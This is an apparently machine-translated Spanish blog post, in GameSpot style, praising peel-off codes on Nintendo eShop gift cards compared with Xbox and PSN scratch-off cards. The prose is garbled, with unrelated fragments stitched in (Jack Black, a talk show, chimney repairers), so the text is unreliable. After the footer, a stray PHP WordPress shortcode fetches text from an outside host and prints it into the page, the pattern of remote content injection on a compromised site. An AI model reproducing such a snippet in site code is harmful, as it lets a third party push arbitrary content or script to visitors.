Nunca esperé que Nintendo superara a la competencia cuando se trata de cualquier cosa relacionada con sus servicios en línea. Pero resulta que las tarjetas de regalo tienen mucho más que ofrecer.


Soy un entusiasta de los juegos digitales. Reconozco las desventajas de la “propiedad” digital, ya sea que las empresas corten su acceso a voluntad, cambien el texto de sus libros, rechacen su dinero por completo o temporalmente. Tenga la capacidad de presumir, en realidad simplemente lo es. Licenciamiento de la naturaleza del medio. Pero soy lento e impulsivo cuando se trata de juegos: a menudo quiero cambiar entre un montón de juegos diferentes en rápida sucesión y, bueno, me duele la espalda y tengo que levantarme cada vez que no quiero. Y cambie un nuevo disco, tanto como a mi gato le gusta verlos entrar o salir de la consola. Y particularmente no quiero ser diferente El cuarto De mi colección de juegos si llevo mi Switch por mi casa. Pensar demasiado me da escalofríos.


Como tal, he recurrido a la compra de juegos digitales casi exclusivamente. Es muy poco probable que las tiendas digitales en consolas, y especialmente Switch eShop, ofrezcan ofertas de la misma calidad que encontrarás en juegos físicos, por lo que me veo obligado a hacer mis propias ofertas. Básicamente, esto implica comprar tarjetas de regalo cuando están en oferta: las mejores ofertas suelen bajar el precio en un 20 %, lo que significa que obtengo un 20 % de descuento en todo lo que compro. Sí (y esto se suma a las ofertas que ofrecen las tiendas digitales). ). Es una excelente manera de ahorrar dinero sin sacrificar la comodidad digital que tanto anhelo.


Esas ofertas del 20 % no ocurren todo el tiempo, y no siempre están en un sistema en el que necesito algo de efectivo en mi billetera virtual, así que obtuve un 20 % de descuento en las tarjetas de regalo de Xbox Live, PSN y Switch eShop. feliz. Costco recientemente. Normalmente, compraría estas tarjetas digitalmente, para evitar tener que escribir manualmente todos esos códigos (Costco lo empeoró aún más al vender estas tarjetas de regalo de $ 100 en paquetes de cuatro por $ 25 cada una). Pero decidí comprar tarjetas de regalo físicas porque, dado que la venta finalizaba ese día, quería asegurarme de no olvidarme de pedirlas en línea, donde se censuraron los genitales de Jack Black.Me molesto después de escuchar una historia de The Kelly Clarkson Espectáculo. como tu lo haces.


Cuando finalmente llegó el momento de abrir el empaque, me di cuenta de que necesitaría una moneda para raspar las tarjetas. Incapaz de encontrar uno (¿debería buscar en las alcantarillas?), Consideré usar mis uñas o un par de tijeras, a pesar de saber que hacerlo una vez hizo que la tarjeta de regalo fuera ilegible para mí. He aquí que abrí las primeras tarjetas de cambio y descubrí una maravillosa sorpresa en forma de dos palabras: Peel Off.


No intente leer el código. Ya lo he redimido, lo prometo.
No intente leer el código. Ya lo he redimido, lo prometo.

Sí, en algún momento desde la última vez que compré tarjetas de regalo físicas, sin duda recurriendo al intercambio frenético de mis copias de Wii Play, Pinball Hall of Fame y D-Blob de las que he estado hablando. una tarjeta de regalo La industria ha logrado uno de los mayores avances tecnológicos de mi vida al reemplazar los códigos para raspar. Este es el mejor descubrimiento desde que descubrí, seis años después de comprarlo, que un Instant Pot está diseñado para tener su propia tapa.


Absolutamente encantado, ingresé código tras código, solo para descubrir que Nintendo parece tener algún tipo de temporizador de enfriamiento que evita que canjees demasiados códigos en un corto período de tiempo. Estaba tan feliz con la mejora en la calidad de vida que no me importó, porque sé mejor que esperar que nada salga completamente bien, como aprendí esta semana cuando estaba en casa. Los reparadores de chimeneas me pidieron que explicara cómo Debería reinstalar algunas tuberías.


Sin desanimarme, tomé mis tarjetas de regalo de Xbox, abrí el empaque (¡no se requieren tijeras ni manipulación manual para nada de esto!) y me decepcionó descubrir que tenían el raspadito clásico. Desconcertado, abrí las tarjetas de regalo de PSN y la mala suerte me golpeó de nuevo: más códigos para raspar.


Tal vez sea un lote antiguo de tarjetas Xbox y PSN que compré, pero la diferencia podría deberse al fabricante. Según el reverso de las tarjetas, Nintendo se asocia con InComm Payments, mientras que Microsoft y Sony usan FastCard de e2interactive. No sé desde cuándo existen estos peelings, pero lo son. Magnífico.


Cualquiera que sea el caso, no puedo evitar sentir que he llegado a mi propio episodio personal de Twilight Zone, con un lado de afiliado en línea de las operaciones de Nintendo realmente mejor que el de Microsoft y el de Sony. Agregue un programa de cupones de juego resurgente, y ambas compañías deberían comenzar a tomar nota.




Los productos discutidos aquí fueron seleccionados de forma independiente por nuestros editores. GameSpot puede recibir una parte de los ingresos si compra algo que aparece en nuestro sitio.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');